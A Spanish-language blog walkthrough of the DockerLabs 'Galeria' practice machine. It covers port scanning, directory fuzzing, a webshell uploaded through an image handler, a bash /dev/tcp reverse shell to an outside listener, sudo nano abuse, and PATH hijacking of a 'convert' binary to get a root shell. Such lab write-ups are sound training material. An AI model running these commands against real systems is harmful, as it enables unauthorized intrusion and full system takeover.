Post

Galeria, DockerLabs

portada

Herramientas y recursos

En este reto de DockerLabs practicamos.

Tecnicas Herramientas
scan de puertos nmap
fuzzing directorios y ficheros feroxbuster
revshell bash
escalada de privilegios nano
Pahthijacking creacion de script

Reconocimiento y enumeracion

Lo primero como siempre le tiramos un nmap con los parámetros de costumbre.

1
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -oX walkingdead 172.18.0.2

reporte

Como vemos en el reporte en esta ocasion tenemos varios puertos abiertos el el 21 ftp, el 80 http

Yo no encontre nada interesante en el ftp pero si en el http, en este caso la web es una galeria de imagenes y aplicandole fuzzing aparecen cositas interesantes.

1
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -t 400 -u http://172.17.0.2

feroxbuster

De todo eso eso nos interesa el handler.php, que es un script que se encarga de subir imagenes a la galeria. Tratandose de una facil directamente subo un una webshell.php y me la ejecuto.

handler

upok

Ahora solo debemos ir a la ruta donde sea subido que deberia ser la misma de donde estan las fotos en feroxbuster lo hemos visto antes.

Desde la webshell puedes hacer lo que el usuario te permita pero yo la uso para mandarme un revshell “es lo que tenia a mano” no sin antes ponernos en escucha con nc

1
nc -lvnp 1188
1
bash -c 'exec bash -i &>/dev/tcp/192.168.0.106/1188 <&1'

Como la terminal no parece ser un tty le realizo **tratamiento de la tty .

1
2
3
4
5
6
7
8
script /dev/null -c bash 
   control Z con esto la pasamos a segundo plano
  stty raw -echo ; fg
  reset
    en otra terminal lanzamos stty size para saber el numero de filas y columnas de nuestra terminal
  export TERM=xterm
  export SHELL=bash
  stty rows 32 columns 149

Infiltracion y escalada de privilegios

Ahora que tenemos acceso a la terminal de la maquina, lo primero que hacemos es ver que usuario somos.

1
whoami

Obvio somo www-data , ejecutamos lo tipico sudo -l.

wwwdata

Vemos que podemos ejecutar como gallery el otro usuario no se que pinta dado que ya soy el.

1
searchbins -b nano -f sudo

searchbins

1
sudo -u gallery /usr/bin/nano

y seguimos los pasos de searchbins para convertirnos en gallery.

gallery

Ya como gallery hacemos lo mismo

1
sudo -l

En esta ocasion nos han dejado un binario que podemos ejecutar como root.Observemos lo que hace

binario

Vemos que trata de convertir imagenes con un comando que se incluye en imagemagick o al menos antes formaba parte del paquete , pero bueno la cuestion es que no lo encuentra y lo que vamos a hacer es crearnos un script en nuestro home con el nombre convert y le damos permisos de ejecucion y posteriormente añadimos la ruta donde hemos creado el script al path de la variable de entorno.

1
2
3
echo "/bin/bash -p" > /home/gallery/convert
chmod +x /home/gallery/convert
export PATH=/home/gallery:$PATH

Ahora si ejecutamos el binario como root nos da una shell de root.

root

Muchas gracias a difundir y compartir lo que sabemos.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.